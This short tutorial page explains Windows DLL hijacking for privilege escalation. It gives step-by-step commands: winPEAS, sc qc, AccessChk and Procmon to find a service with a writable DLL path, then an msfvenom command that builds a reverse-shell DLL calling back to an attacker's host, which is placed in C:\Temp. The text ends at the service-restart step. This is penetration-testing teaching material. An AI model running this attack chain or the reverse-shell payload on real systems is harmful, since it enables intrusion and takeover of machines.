Introduction¶
DLL hijacking is a cyberattack that exploits the way Windows applications search for and load Dynamic Link Libraries (DLLs).
By manipulating how DLLs are resolved, an attacker can gain elevated privileges or execute arbitrary code.
How DLL hijacking works¶
- Services in Windows load DLLs with the same privileges as the service. If an attacker controls the DLL, their code executes with those privileges.
- Absolute path vulnerability: When a service loads a DLL from a writable path, an attacker can replace it with a malicious one to escalate privileges.
- If an application fails to find a required DLL, an attacker can place a malicious DLL in a directory that Windows searches, hijacking execution.
- Windows searches for DLLs in a specific order. Attackers exploit this by placing a malicious DLL in a location searched before the legitimate one.
Steps to identify and exploit insecure service executables¶
-
Use winPEAS to list non-Microsoft services:
.\winPEASx64.exe quiet servicesinfo
-
Verify writable directories in the service configuration:
sc qc dllsvc -
Check service access permissions with AccessChk:
.\accesschk.exe /accepteula -uvqc user dllsvc -
Use Procmon to monitor DLL activity for the service:
Procmon64.exe -
Apply filters to exclude registry and network activity, focusing on DLL-related errors.
-
Look for failed DLL load attempts, especially in writable directories such as:
C:\Temp -
Generate a malicious DLL payload with msfvenom:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=[IP-ADDRESS] LPORT=[PORT_NUMBER] -f dll -o hijackme.dll -
Place the malicious DLL in the target directory:
move hijackme.dll C:\Temp -
Restart the vulnerable service to trigger DLL execution: